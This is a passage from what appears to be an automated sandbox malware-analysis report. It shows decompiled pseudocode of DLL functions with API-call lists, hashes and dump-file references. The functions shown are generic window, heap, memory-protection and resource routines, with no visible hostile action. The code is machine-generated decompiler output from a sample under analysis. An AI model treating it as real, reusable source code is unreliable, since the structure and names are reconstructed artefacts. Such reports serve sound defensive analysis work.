					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}

APIs

GetWindowRect.USER32 ref: 1002D84C
EqualRect.USER32 ref: 1002D872
IsWindowVisible.USER32 ref: 1002D900
CopyRect.USER32 ref: 1002D93C
GetParent.USER32(?), ref: 1002D9FA

Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$ParentWindow$CopyEqualVisible
String ID:
API String ID: 545338366-0
Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45

Uniqueness

Uniqueness Score: -1.00%

Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10013A38(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10013B9B(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E100124B7();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x10050a50; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E1001409B();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E1001437A();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011440( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10013B9B(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10013BC6();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011440( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10013BC6();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10014676(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E100107C8(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E100107B6( *(_t67 + 0xc));
					L37:
					return E1001254F(_t28);
				}
			}

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100071BF Relevance: 7.6, APIs: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E100373B5() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10006D96( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
LoadResource.KERNEL32(?,00000000), ref: 100071F4
LockResource.KERNEL32(00000000), ref: 10007209
FreeResource.KERNEL32(00000000), ref: 1000723C
GetDlgItem.USER32 ref: 100072E6

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeItemLoadLock
String ID:
API String ID: 996205394-0
Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetWindowRect.USER32 ref: 1003450F
GetSystemMetrics.USER32 ref: 1003451D
GetSystemMetrics.USER32 ref: 10034523
GetKeyState.USER32 ref: 10034540
InflateRect.USER32(?,00000000,00000000), ref: 10034573

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650

Uniqueness

Uniqueness Score: -1.00%

Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90

Uniqueness

Uniqueness Score: -1.00%

Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
